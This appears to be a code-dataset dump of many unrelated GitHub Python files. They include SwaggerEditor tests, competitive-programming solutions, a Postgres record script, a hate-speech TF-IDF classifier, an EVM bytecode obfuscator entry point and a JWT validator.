test_allow_origins_is_not_skipped_with_no_value(self):\n headers = None\n methods = None\n origins = None\n\n expected = {\n # We will ALWAYS set AllowOrigin. This is a minimum requirement for CORS\n \"method.response.header.Access-Control-Allow-Origin\": origins\n }\n\n options_config = SwaggerEditor(SwaggerEditor.gen_skeleton())._options_method_response_for_cors(\n origins, headers, methods)\n\n actual = options_config[_X_INTEGRATION][\"responses\"][\"default\"][\"responseParameters\"]\n self.assertEquals(expected, actual)\n\n def test_max_age_can_be_set_to_zero(self):\n headers = None\n methods = \"methods\"\n origins = \"origins\"\n max_age = 0\n\n expected = {\n \"method.response.header.Access-Control-Allow-Methods\": methods,\n \"method.response.header.Access-Control-Allow-Origin\": origins,\n \"method.response.header.Access-Control-Max-Age\": max_age\n }\n\n options_config = SwaggerEditor(SwaggerEditor.gen_skeleton())._options_method_response_for_cors(\n origins, headers, methods, max_age)\n\n actual = options_config[_X_INTEGRATION][\"responses\"][\"default\"][\"responseParameters\"]\n self.assertEquals(expected, actual)\n\n\nclass TestSwaggerEditor_make_cors_allowed_methods_for_path(TestCase):\n\n def setUp(self):\n self.editor = SwaggerEditor({\n \"swagger\": \"2.0\",\n \"paths\": {\n \"/foo\": {\n \"get\": {},\n \"POST\": {},\n \"DeLeTe\": {}\n },\n \"/withany\": {\n \"head\": {},\n _X_ANY_METHOD: {}\n },\n \"/nothing\": {\n }\n }\n })\n\n def test_must_return_all_defined_methods(self):\n path = \"/foo\"\n expected = \"DELETE,GET,OPTIONS,POST\" # Result should be sorted alphabetically\n\n actual = self.editor._make_cors_allowed_methods_for_path(path)\n self.assertEquals(expected, actual)\n\n def test_must_work_for_any_method(self):\n path = \"/withany\"\n expected = \"DELETE,GET,HEAD,OPTIONS,PATCH,POST,PUT\" # Result should be sorted alphabetically\n\n actual = self.editor._make_cors_allowed_methods_for_path(path)\n self.assertEquals(expected, actual)\n\n def test_must_work_with_no_methods(self):\n path = \"/nothing\"\n expected = \"OPTIONS\"\n\n actual = self.editor._make_cors_allowed_methods_for_path(path)\n self.assertEquals(expected, actual)\n\n def test_must_skip_non_existent_path(self):\n path = \"/no-path\"\n expected = \"\"\n\n actual = self.editor._make_cors_allowed_methods_for_path(path)\n self.assertEquals(expected, actual)\n\n\nclass TestSwaggerEditor_normalize_method_name(TestCase):\n\n @parameterized.expand([\n param(\"GET\", \"get\", \"must lowercase\"),\n param(\"PoST\", \"post\", \"must lowercase\"),\n param(\"ANY\", _X_ANY_METHOD, \"must convert any method\"),\n param(None, None, \"must skip empty values\"),\n param({\"a\": \"b\"}, {\"a\": \"b\"}, \"must skip non-string values\"),\n param([1, 2], [1, 2], \"must skip non-string values\"),\n ])\n def test_must_normalize(self, input, expected, msg):\n self.assertEquals(expected, SwaggerEditor._normalize_method_name(input), msg)\n\n\nclass TestSwaggerEditor_swagger_property(TestCase):\n\n def test_must_return_copy_of_swagger(self):\n\n input = {\n \"swagger\": \"2.0\",\n \"paths\": {}\n }\n\n editor = SwaggerEditor(input)\n self.assertEquals(input, editor.swagger) # They are equal in content\n input[\"swagger\"] = \"3\"\n self.assertEquals(\"2.0\", editor.swagger[\"swagger\"]) # Editor works on a diff copy of input\n\n editor.add_path(\"/foo\", \"get\")\n self.assertEquals({\"/foo\": {\"get\": {}}}, editor.swagger[\"paths\"])\n self.assertEquals({}, input[\"paths\"]) # Editor works on a diff copy of input\n\n\nclass TestSwaggerEditor_is_valid(TestCase):\n\n @parameterized.expand([\n param(SwaggerEditor.gen_skeleton()),\n\n # Dict can contain any other unrecognized properties\n param({\"swagger\": \"anyvalue\", \"paths\": {}, \"foo\": \"bar\", \"baz\": \"bar\"})\n ])\n def test_must_work_on_valid_values(self, swagger):\n self.assertTrue(SwaggerEditor.is_valid(swagger))\n\n @parameterized.expand([\n ({}, \"empty dictionary\"),\n ([1, 2, 3], \"array data type\"),\n ({\"paths\": {}}, \"missing swagger property\"),\n ({\"swagger\": \"hello\"}, \"missing paths property\"),\n ({\"swagger\": \"hello\", \"paths\": [1, 2, 3]}, \"array value for paths property\"),\n ])\n def test_must_fail_for_invalid_values(self, data, case):\n self.assertFalse(SwaggerEditor.is_valid(data), \"Swagger dictionary with {} must not be valid\".format(case))\n","repo_name":"udinachmany/lambda-hello-world","sub_path":"tests/swagger/test_swagger.py","file_name":"test_swagger.py","file_ext":"py","file_size_in_byte":22032,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"70741854314","text":"n, q = map(int, input().split())\nal = list(map(int, input().split()))\nlrvl = [list(map(int, input().split())) for _ in range(q)]\n\nif n == 1:\n print(*[0]*q, sep=\"\\n\")\n exit()\n\n# 必要な情報は横との差だけ\ndif = [] # dif[i]: [d1, d2]: 前との差,後との差(自分 - 相手)->自分が相手よりdn高い\nfor i in range(n):\n if i == 0:\n dif.append([0, al[i] - al[i + 1]])\n elif i == n - 1:\n dif.append([al[i] - al[i - 1], 0])\n else:\n dif.append([al[i] - al[i - 1], al[i] - al[i + 1]])\n\nans = sum([abs(a - b) for a, b in zip(al, al[1:])])\nfor l, r, v in lrvl:\n l, r = l - 1, r - 1\n # 左端処理\n bef_l = abs(dif[l][0])\n if l > 0:\n dif[l][0] += v\n dif[l - 1][1] -= v\n crt_l = abs(dif[l][0])\n # 右端処理\n bef_r = abs(dif[r][1])\n if r < n - 1:\n dif[r][1] += v\n dif[r + 1][0] -= v\n crt_r = abs(dif[r][1])\n ans += (crt_l + crt_r) - (bef_l + bef_r)\n\n print(ans)","repo_name":"ymsk-sky/atcoder_part3","sub_path":"typical90/064_Uplift.py","file_name":"064_Uplift.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20100114998","text":"import psycopg2\nimport datetime\n\ncon = psycopg2.connect(\n database=\"Record_bd\",\n user=\"postgres\",\n password=\"12345\",\n host=\"localhost\",\n port=\"5432\"\n)\n\n\ndef insert_record(channel, record_type, record, record_path, datetime_start, datetime_stop, record_length,\n record_extension, snapshot_path):\n cur = con.cursor()\n try:\n cur.execute(\"INSERT INTO record_info (id_channel, record_type, id_record, record_path, datetime_start, \"\n \"datetime_stop, record_length, record_extension, snapshot_path) VALUES (%s,%s,%s,%s,%s,%s,%s,%s,%s)\",\n (channel, record_type, record, record_path, datetime_start, datetime_stop, record_length,\n record_extension, snapshot_path))\n except psycopg2.DatabaseError as err:\n print(\"Error: \", err)\n else:\n con.commit()\n con.close()\n\n\ndef select_record(dt_start, dt_stop):\n global record\n cur = con.cursor()\n sql = \"SELECT * FROM record_info WHERE datetime_start > %s AND datetime_stop < %s\"\n try:\n cur.execute(sql, (dt_start, dt_stop))\n record = cur.fetchall() # возвращает все строки\n print(record)\n except psycopg2.DatabaseError as err:\n print(\"Error: \", err)\n else:\n con.commit()\n con.close()\n if record is not None:\n return record\n\n\nstart = datetime.datetime(2022, 7, 6, 11, 30, 40)\nstop = datetime.datetime(2022, 7, 6, 15, 22, 56)\nselect_record(start, stop)\n# now = datetime.datetime.now()\n# insert_record(1, 'con', 1, '/file', now, now, 12, 'mp4', '/file')\n","repo_name":"msamsonova/repository_record_db","sub_path":"record_bd.py","file_name":"record_bd.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31697065367","text":"matriz = [[], [], []]\npar = soma = maior = 0\nfor i in range(0, 3):\n for c in range(0, 3):\n matriz[i].append(int(input(f'Digite um valor para [{i}, {c}]: ')))\n if matriz[i][c] % 2 == 0:\n par += matriz[i][c]\n if c == 2:\n soma += matriz[i][2]\n if i == 1:\n if c == 0:\n maior = matriz[1][c]\n elif matriz[1][c] > maior:\n maior = matriz[1][c]\nprint(30 * '-=')\nfor i in range(0, 3):\n for c in range(0, 3):\n print(f'[{matriz[i][c]:^5}]', end='')\n print(end='\\n')\nprint(30 * '-=')\nprint(f'A soma dos valores pares é {par}.'\n f'\\nA soma dos valores da terceira coluna é {soma}.'\n f'\\nO maior valor da segunda linha é {maior}.')\n","repo_name":"henrique-sk/Python-Curso-em-Video","sub_path":"Mundo01-03/Exercicios/ex087.py","file_name":"ex087.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74822084071","text":"# Created by hiddencoder at 23.04.2019\r\nimport json\r\nimport re\r\nimport emoji\r\n\r\n\r\ndef give_emoji_free_text(dict_):\r\n text = dict_['text'].encode()\r\n allchars = [str for str in text.decode('utf-8')]\r\n emoji_list = [c for c in allchars if c in emoji.UNICODE_EMOJI]\r\n clean_text = ' '.join([str for str in text.decode('utf-8').split() if\r\n not any(i in str for i in emoji_list)])\r\n dict_['text'] = clean_text + \" \"\r\n return dict_\r\n\r\nclass DataExtractor:\r\n \"\"\"\r\n Class which allows to extract data.\r\n \"\"\"\r\n\r\n def __init__(self, file, encoding=\"utf-8-sig\"):\r\n self.__file = file\r\n self.__encoding = encoding\r\n self.__json_dump()\r\n self.__result_data = self.__get_data()\r\n\r\n def __json_read(self):\r\n \"\"\"\r\n Reader.\r\n\r\n Using for JSON-file reading\r\n :param file_name: file which want to open\r\n :param encoding: file encoding (utf8 using by default)\r\n :return: reader_object\r\n \"\"\"\r\n with open(self.__file, 'r', encoding=self.__encoding) as file:\r\n\r\n data = json.load(file)\r\n if data['chats']['list']:\r\n list_to_insert = data['chats']['list']\r\n else:\r\n raise ValueError\r\n\r\n return list_to_insert\r\n\r\n def __json_dump(self):\r\n with open(\"data.json\", 'w', encoding=self.__encoding) as file:\r\n list_to_insert = self.__json_read()\r\n for i in range(len(list_to_insert)):\r\n tmp_messages = list_to_insert[i]['messages']\r\n tmp_messages = list(filter(lambda x: not isinstance(x[\"text\"], list), tmp_messages))\r\n list_to_insert[i]['messages'] = tmp_messages\r\n # for i in list_to_insert: print(i)\r\n for i in list_to_insert:\r\n i['messages'] = list(map(lambda x: give_emoji_free_text(x), i[\"messages\"]))\r\n json.dump(list_to_insert, file)\r\n\r\n def __get_data(self):\r\n with open(\"data.json\", \"r\", encoding=self.__encoding) as file:\r\n data = json.load(file)\r\n return data\r\n\r\n @property\r\n def file(self):\r\n return self.__file\r\n\r\n @property\r\n def result_data(self):\r\n return self.__result_data\r\n","repo_name":"andriymurovanyi/Sentiment-analisys","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":2256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1672124646","text":"import sys\r\n\r\nboard = [list(map(int, sys.stdin.readline().strip().split())) for _ in range(5)]\r\ndx = [-1, 0, 1, 0]\r\ndy = [0, -1, 0, 1]\r\n\r\n\r\ndef dfs(board, start):\r\n return dfs_helper(start, 0, \"\")\r\n\r\n\r\nresult = set([])\r\n\r\n\r\ndef dfs_helper(start, depth, cur):\r\n if depth == 6:\r\n result.add(cur)\r\n return\r\n\r\n for i in range(4):\r\n nx = start[0] + dx[i]\r\n ny = start[1] + dy[i]\r\n if 0 <= nx <= 4 and 0 <= ny <= 4:\r\n dfs_helper([nx, ny], depth + 1, cur + str(board[ny][nx]))\r\n\r\n\r\nfor y, row in enumerate(board):\r\n for x, num in enumerate(row):\r\n start = [x, y]\r\n dfs(board, start)\r\n\r\nprint(len(result))\r\n","repo_name":"slackjawed12/codetest","sub_path":"백준/Silver/2210. 숫자판 점프/숫자판 점프.py","file_name":"숫자판 점프.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"43905070845","text":"#!/usr/bin/env python3\n\nimport json\nfrom fx_rate import FxRate\n\n\nclass Fees:\n def __init__(self, conf_file, fx_rate):\n with open(conf_file, \"r\") as infile:\n self.conf = json.loads(infile.read())\n self.fx_rate = fx_rate\n return\n\n def get_total_buy_side_fees(self, venue, buy_price_usd=None):\n \"\"\"\n Buy side fees. All fees are denominated in USD.\n \"\"\"\n if venue == \"stockx\":\n return self.conf[venue][\"buy_shipping_usd\"]\n raise RuntimeError(\"fees: unsupported venue / unimplemented {}\".format(venue))\n\n def get_total_sell_side_fees(self, venue, sell_price_usd=None):\n \"\"\"\n Sell side fees. All fees are denominated in USD.\n \"\"\"\n if venue == \"du\":\n if not sell_price_usd:\n raise RuntimeError(\n \"sell_price_usd is required to get fees on {}\".format(venue)\n )\n return sell_price_usd * (\n self.conf[venue][\"commission_percent\"]\n + self.conf[venue][\"tech_service_percent\"]\n + self.conf[venue][\"transfer_percent\"]\n ) / 100 + self.fx_rate.get_spot_fx(\n self.conf[venue][\"packaging_cny\"]\n + self.conf[venue][\"verification_cny\"]\n + self.conf[venue][\"service_cny\"],\n \"CNY\",\n \"USD\",\n )\n raise RuntimeError(\"fees: unsupported venue / unimplemented {}\".format(venue))\n\n def get_shipping_cost(self, buy_venue, sell_venue):\n \"\"\"\n Cost of transfers the item from buy side to sell side: shipping, etc.\n All fees are denominated in USD.\n \"\"\"\n if buy_venue == \"stockx\" and sell_venue == \"du\":\n return self.conf[\"shipping\"][\"stockx_du_usd\"]\n raise RuntimeError(\n \"fees: unsupported venue / unimplemented {} {}\".format(\n buy_venue, sell_venue\n )\n )\n\n def get_list_price_for_sell_value(self, venue, target_value_usd, out_ccy=None):\n \"\"\"\n The reverse of `get_total_sell_side_fees`.\n All fees are denominated in USD unless specified otherwise.\n \"\"\"\n if venue == \"du\":\n list_price_usd = (\n target_value_usd\n + self.fx_rate.get_spot_fx(\n self.conf[venue][\"packaging_cny\"]\n + self.conf[venue][\"verification_cny\"]\n + self.conf[venue][\"service_cny\"],\n \"CNY\",\n \"USD\",\n )\n ) / (\n 1\n - (\n (\n self.conf[venue][\"commission_percent\"]\n + self.conf[venue][\"tech_service_percent\"]\n + self.conf[venue][\"transfer_percent\"]\n )\n / 100\n )\n )\n if not out_ccy or out_ccy == \"USD\":\n return list_price_usd\n else:\n return self.fx_rate.get_spot_fx(list_price_usd, \"USD\", \"CNY\")\n raise RuntimeError(\"fees: unsupported venue / unimplemented {}\".format(venue))\n\n def _get_income_expenditure(\n self, buy_venue, sell_venue, buy_price_usd, sell_price, sell_price_ccy=None\n ):\n if not sell_price_ccy:\n sell_price_usd = sell_price\n else:\n sell_price_usd = self.fx_rate.get_spot_fx(sell_price, sell_price_ccy, \"USD\")\n total_expenditure = (\n buy_price_usd\n + self.get_total_buy_side_fees(buy_venue, buy_price_usd=buy_price_usd)\n + self.get_shipping_cost(buy_venue, sell_venue)\n )\n total_income = sell_price_usd - self.get_total_sell_side_fees(\n sell_venue, sell_price_usd=sell_price_usd\n )\n return total_income, total_expenditure\n\n def get_profit_percent(\n self, buy_venue, sell_venue, buy_price_usd, sell_price, sell_price_ccy=None\n ):\n \"\"\"\n How much percent can we make if we buy and sell at the given prices.\n Fees on both sides are applied in this function.\n Ratio is calculated as:\n total_expenditure = buy_price + buy_fees + shipping_buy_to_sell\n total_income = sell_price - sell_fees\n ratio = (total_income - total_expenditure) / total_expenditure\n \n All fees are denominated in USD unless specified otherwise.\n \"\"\"\n total_income, total_expenditure = self._get_income_expenditure(\n buy_venue, sell_venue, buy_price_usd, sell_price, sell_price_ccy\n )\n profit_ratio = (total_income - total_expenditure) / total_expenditure\n return profit_ratio\n\n def get_profit_value(\n self, buy_venue, sell_venue, buy_price_usd, sell_price, sell_price_ccy=None\n ):\n \"\"\"\n Similar as `get_profit_percent` but in value\n \"\"\"\n total_income, total_expenditure = self._get_income_expenditure(\n buy_venue, sell_venue, buy_price_usd, sell_price, sell_price_ccy\n )\n return total_income - total_expenditure\n\n def get_target_list_price_for_target_ratio(\n self, buy_venue, sell_venue, target_ratio, buy_price_usd, out_ccy=None\n ):\n \"\"\"\n The reverse of `get_profit_percent`.\n All fees are denominated in USD unless specified otherwise.\n \"\"\"\n total_expenditure = (\n buy_price_usd\n + self.get_total_buy_side_fees(buy_venue, buy_price_usd=buy_price_usd)\n + self.get_shipping_cost(buy_venue, sell_venue)\n )\n total_income = total_expenditure * (1 + target_ratio)\n list_price = self.get_list_price_for_sell_value(\n sell_venue, total_income, out_ccy=out_ccy\n )\n return list_price\n\n\nif __name__ == \"__main__\":\n fx_rate = FxRate()\n fees = Fees(\"fees.json\", fx_rate)\n","repo_name":"zhehaowang/sneaky","sub_path":"src/strategy/fees.py","file_name":"fees.py","file_ext":"py","file_size_in_byte":5906,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"72"} +{"seq_id":"12037509712","text":"from alembic import context\n\nfrom transiter.db import dbconnection, models\n\n# this is the Alembic Config object, which provides\n# access to the values within the .ini file in use.\nconfig = context.config\n\ntarget_metadata = models.Base.metadata\n\n\ndef run_migrations_online():\n \"\"\"Run migrations in 'online' mode.\n\n In this scenario we need to create an Engine\n and associate a connection with the context.\n\n \"\"\"\n connectable = dbconnection.create_engine()\n\n with connectable.connect() as connection:\n context.configure(connection=connection, target_metadata=target_metadata)\n\n with context.begin_transaction():\n context.run_migrations()\n\n\nrun_migrations_online()\n","repo_name":"jamespfennell/transiter-python","sub_path":"transiter/db/alembic/env.py","file_name":"env.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4341204695","text":"n = int(input())\np = [*map(int, input().split())]\nq = [*map(int, input().split())]\nfrom itertools import permutations\n\nfor i, v in enumerate(permutations(range(1, n + 1))):\n if all([True if t == p[j] else False for j, t in enumerate(v)]):\n a = i\n if all([True if t == q[j] else False for j, t in enumerate(v)]):\n b = i\nprint(abs(a - b))\n","repo_name":"thanaism/online-judge","sub_path":"python/abc-c/abc150_c.py","file_name":"abc150_c.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5575419652","text":"import torch.optim as optim\nfrom .scheduler import CosineWithRestarts\n\n\ndef create_optimizer(params, mode='adam', base_lr=1e-3, t_max=10):\n if mode == 'adam':\n optimizer = optim.Adam(params, base_lr)\n elif mode == 'sgd':\n optimizer = optim.SGD(params, base_lr, momentum=0.9, weight_decay=4e-5)\n else:\n raise NotImplementedError(mode)\n\n scheduler = CosineWithRestarts(optimizer, t_max)\n\n return optimizer, scheduler\n","repo_name":"nyoki-mtl/pytorch-segmentation","sub_path":"src/utils/optimizer.py","file_name":"optimizer.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","stars":372,"dataset":"github-code","pt":"72"} +{"seq_id":"33131021066","text":"from typing import Any\nfrom typing import Dict\nfrom typing import List\nfrom typing import Optional\nfrom typing import Tuple\nfrom typing import Union\n\nfrom ._const import METHODS\nfrom ._dataclasses import ExecutionBlock\nfrom ._dataclasses import ParserState\nfrom ._parsers import BlockParser\nfrom .methods import Methods\nfrom .methods import MethodsError\n\n\ndataType = Dict[str, Dict[str, Union[List[str], Dict[str, Any], str]]]\nreturnDataType = Dict[str, Dict[str, Any]] # I'm not sure about this\nparserReturnType = Union[Tuple[returnDataType,\n None, None], Tuple[None, int, str]]\n\n\ndef verify_data_type(data: object) -> dataType:\n # I'll implement this later\n if isinstance(data, dict):\n return data\n\n return dict()\n\n\ndef block_executor(ebs: List[ExecutionBlock], pes: List[ExecutionBlock], methods: Methods) -> parserReturnType:\n\n pes_ids = {i.header.id: i for i in pes}\n req_methods_dict = {i: getattr(methods, i.lower()) for i in METHODS}\n block_output_err: Optional[Tuple[None, int, str]] = None\n\n def block_output(block: ExecutionBlock) -> Any:\n nonlocal block_output_err\n\n q_data = {}\n\n for q in block.query:\n try:\n q_data[q.alias if q.alias else q.query] = req_methods_dict[block.header.method](\n q.args, q.contents)\n except NotImplementedError:\n block_output_err = (\n None, 611, f\"{block.header.method!r} is not implemented\")\n return None\n except MethodsError as e:\n block_output_err = (\n None, e.code, e.msg\n )\n return None\n\n if block.after:\n q_data[\"after\"] = block_output(pes_ids[block.after])\n\n return q_data\n\n temp_data = {}\n\n for eb in ebs:\n if eb.after:\n if eb.after not in pes_ids:\n return (None, 610,\n f\"The 'after' execution block {eb.after!r} does not exists for the block {eb.header.id!r}\")\n\n val = block_output(eb)\n\n if val:\n temp_data[eb.header.id] = val\n\n else:\n break\n\n return (temp_data, None, None) if not block_output_err else block_output_err\n\n\ndef parse(methods: Methods, data: object) -> parserReturnType:\n\n curr_state = ParserState()\n\n methods_dict = {i: getattr(\n methods, f\"{i.lower()}_query_parser\", None) for i in METHODS}\n\n data = verify_data_type(data)\n\n if data:\n for k, v in data.items():\n\n eb, err, msg = BlockParser({k: v}, methods_dict).parse()\n\n if eb:\n if eb.header.id in curr_state.ids:\n return (None, 607, \"Two execution blocks cannot have the same ID\")\n else:\n curr_state.ids.append(eb.header.id)\n\n if eb.header.property_key == \"pe\":\n curr_state.pes.append(eb)\n else:\n curr_state.ebs.append(eb)\n else:\n if err and msg:\n return (None, err, msg)\n\n return block_executor(ebs=curr_state.ebs, pes=curr_state.pes, methods=methods)\n\n return (None, 600, \"Invalid Data\")\n","repo_name":"Adwaith-Rajesh/loafang","sub_path":"loafang/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":3257,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"1771450204","text":"import pandas as pd\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nfrom tensorflow.keras.utils import to_categorical\r\nfrom sklearn.utils import shuffle\r\nfrom HandleImbalances import use_smote\r\nfrom tensorflow.keras.models import Sequential\r\nfrom tensorflow.keras.layers import Conv1D, MaxPooling1D, Dense, Flatten, Dropout\r\nfrom tensorflow.keras.metrics import Precision, Recall, AUC\r\nfrom tensorflow.keras.optimizers import Adam\r\nfrom tensorflow.keras.callbacks import ModelCheckpoint\r\n\r\ntrain_dataset_df = pd.read_csv('./Result/OSACT2022-taskA-train.csv', usecols=['tweet','off_label'], encoding='utf-8')\r\neval_dataset_df = pd.read_csv('./Result/OSACT2022-taskA-dev.csv', usecols=['tweet','off_label'], encoding='utf-8')\r\n\r\ntfidf_vectorizer = TfidfVectorizer(lowercase=False, encoding='utf-8', input='content', ngram_range=(1,2), token_pattern=r\"(?u)\\b\\w\\w+\\b\", min_df=2, max_df=0.5, max_features=300)\r\nfeatures = tfidf_vectorizer.fit_transform(train_dataset_df['tweet'])\r\n\r\nfeatures_df = pd.DataFrame(features.todense(), columns=tfidf_vectorizer.get_feature_names())\r\n\r\nx_train = features_df.values\r\ny_train = to_categorical(train_dataset_df['off_label'], num_classes=2)\r\n\r\nx_train, y_train = shuffle(x_train, y_train)\r\n\r\neval_tfidf_vectorizer = TfidfVectorizer(lowercase=False, encoding='utf-8', input='content', ngram_range=(1,2), token_pattern=r\"(?u)\\b\\w\\w+\\b\", min_df=2, max_df=0.5, vocabulary=tfidf_vectorizer.get_feature_names())\r\neval_features = eval_tfidf_vectorizer.fit_transform(eval_dataset_df['tweet'])\r\neval_features_df = pd.DataFrame(eval_features.todense(), columns=tfidf_vectorizer.get_feature_names())\r\n\r\nx_eval = eval_features_df.values\r\ny_eval = to_categorical(eval_dataset_df['off_label'], num_classes=2)\r\n\r\nmodel = Sequential()\r\nmodel.add(Conv1D(filters=64, kernel_size=4, activation='relu', input_shape=(x_train.shape[1], 1)))\r\nmodel.add(Conv1D(filters=64, kernel_size=3, activation='relu'))\r\nmodel.add(Conv1D(filters=64, kernel_size=2, activation='relu'))\r\nmodel.add(MaxPooling1D(pool_size=1))\r\nmodel.add(Dropout(0.5))\r\nmodel.add(Flatten())\r\nmodel.add(Dense(x_train.shape[1], activation='relu'))\r\nmodel.add(Dense(y_train.shape[1], activation='sigmoid'))\r\nmodel.compile(optimizer=Adam(learning_rate=5e-5), loss='binary_crossentropy', metrics=[Precision(), Recall(), AUC()])\r\n\r\nmodel_checkpoint_callback = ModelCheckpoint(\r\n filepath='./tfidf_temp/checkpoint',\r\n save_weights_only=True,\r\n monitor='val_precision',\r\n mode='max',\r\n save_best_only=True)\r\n\r\nmodel.fit(x_train, y_train,validation_data=(x_eval, y_eval), batch_size=32, epochs=10, verbose=2, callbacks=model_checkpoint_callback)\r\n\r\nmodel.load_weights('./tfidf_temp/checkpoint')\r\n\r\nprint(\"Saving model and weights started\")\r\nmodel_json = model.to_json()\r\nwith open('./tfidf_model/model.json', 'w') as file:\r\n file.write(model_json)\r\n\r\nmodel.save_weights('./tfidf_model/weights.h5')\r\nprint(\"Saving model and weights ended\")\r\n\r\n#tfidf model with smote over resampling technique for class imbalancing\r\n\r\nx_train_resampled, y_train_resampled = use_smote(x_train, y_train) \r\ny_train_resampled = to_categorical(y_train_resampled, num_classes = 2)\r\n\r\nmodel_checkpoint_callback = ModelCheckpoint(\r\n filepath='./tfidf_resampled_temp/checkpoint',\r\n save_weights_only=True,\r\n monitor='val_precision',\r\n mode='max',\r\n save_best_only=True)\r\n\r\nprint('Training on resampled data started')\r\n\r\nmodel.fit(x_train_resampled, y_train_resampled,validation_data=(x_eval, y_eval), batch_size=32, epochs=10, verbose=2, callbacks=model_checkpoint_callback)\r\n\r\nprint('Training on resampled data ended')\r\n\r\nmodel.load_weights('./tfidf_resampled_temp/checkpoint')\r\n\r\nprint(\"Saving model and weights started\")\r\nmodel_json = model.to_json()\r\nwith open('./tfidf_resampled_model/model.json', 'w') as file:\r\n file.write(model_json)\r\n\r\nmodel.save_weights('./tfidf_resampled_model/weights.h5')\r\nprint(\"Saving model and weights ended\")\r\n\r\n\r\n\r\n","repo_name":"ShadyZekry/TextBased-emotion-detection","sub_path":"hate-speech/hate-speech/TfidfModel.py","file_name":"TfidfModel.py","file_ext":"py","file_size_in_byte":3941,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"2371680852","text":"import sys\nfrom obfuscator.obfuscator import Obfuscator\nfrom utils.utils import read_file\nfrom decompiler.decompiler import evmcode_string_to_list\nfrom contract.contract import Contract\nfrom contract.metadata import *\nimport os\n\n# read evmcode file and return decompiled contract\ndef analyze_evmcode_file():\n # read file\n if len(sys.argv) < 2:\n print(\"Usage: %s \" % sys.argv[0])\n return\n filepath = sys.argv[1]\n filename = os.path.basename(filepath)\n evmcode = read_file(filepath)\n bytecode = evmcode_string_to_list(evmcode)\n \n contract = Contract(filename, bytecode) # create Contract \n\n print(\"Successfully decompiled %s\\n\" % filename)\n\n contract.update_pc()\n contract.link_jumpdest_push()\n\n return contract\n\n\n\nimport os\n\ndef write_to_file(contract):\n obfed_dir = os.path.join('examples', 'obfed')\n if not os.path.exists(obfed_dir):\n os.makedirs(obfed_dir)\n \n file_path = os.path.join(obfed_dir, contract.name + '.obf')\n with open(file_path, 'w') as f:\n f.write(contract.get_full_bytecode())\n\n\ndef main():\n #Build Contract\n contract = analyze_evmcode_file()\n obfuscator = Obfuscator(contract)\n contract.update_pc()\n obfuscator.obfuscate_contract()\n contract.update_pc()\n print(contract)\n print(\"Contract functions :\")\n print(contract.func_sig)\n write_to_file(contract)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"TFori/Obfx","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1547986524","text":"import jwt\nfrom jwt import InvalidTokenError\n\nfrom yajwt.entities.jwt_key import JwtKey\nfrom yajwt.entities.jwt_token import JwtToken\nfrom yajwt.jwt_exceptions import JwtKeyNotFound\nfrom yajwt.keys_manager.jwt_keys_manager import JwtKeysManager\n\n\nclass JwtRequestsValidator:\n def __init__(self, jwt_keys_manager: JwtKeysManager):\n self.__jwt_keys_manager = jwt_keys_manager\n\n def validate(self, jwt_token: str) -> JwtToken:\n payload = self.__get_payload(jwt_token)\n team_name = payload.get(\"iss\")\n if team_name is None:\n error_message = \"Unable to get team_name from JWT token.\"\n return JwtToken(False, error_message=error_message)\n\n return self.validate_user(jwt_token, team_name)\n\n def __get_payload(self, jwt_token: str) -> dict:\n return jwt.decode(jwt_token, verify=False)\n\n def __validate(self, jwt_token: str, jwt_key: JwtKey) -> JwtToken:\n try:\n jwt.decode(jwt_token, jwt_key.key, algorithms=jwt_key.algorithm)\n return JwtToken(True, self.__get_payload(jwt_token))\n except (InvalidTokenError, ValueError) as e:\n # ValueError will raise when a public key is not properly formatted\n return JwtToken(False, error_message=str(e))\n\n def validate_user(self, jwt_token: str, team_name: str) -> JwtToken:\n try:\n jwt_key = self.__jwt_keys_manager.get_public_key(team_name)\n return self.__validate(jwt_token, jwt_key)\n except JwtKeyNotFound as e:\n return JwtToken(False, error_message=str(e))\n","repo_name":"Aptoide/yajwt","sub_path":"yajwt/jwt_requests_validator.py","file_name":"jwt_requests_validator.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"30794167044","text":"import sqlite3\nfrom typing import Optional\nfrom datetime import date\nfrom src.TrainingType import TrainingType\nfrom src.TrainingSession import TrainingSession\n\n\nclass HangboardSession(TrainingSession):\n edge_size: int\n performed_at: date\n num_sets: int\n set_hang_time: int\n user_id: int\n training_session_id: int\n\n def __init__(self,\n edge_size: int,\n num_sets: int,\n set_hang_time: int,\n user_id: int,\n performed_at: Optional[date] = date.today()):\n super().__init__(0.0, 'Home', TrainingType.HANGBOARD, user_id, performed_at)\n self.edge_size = edge_size\n self.num_sets = num_sets\n self.set_hang_time = set_hang_time\n self.user_id = user_id\n self.performed_at = performed_at\n\n def create(self):\n self.training_session_id = super().create()\n\n 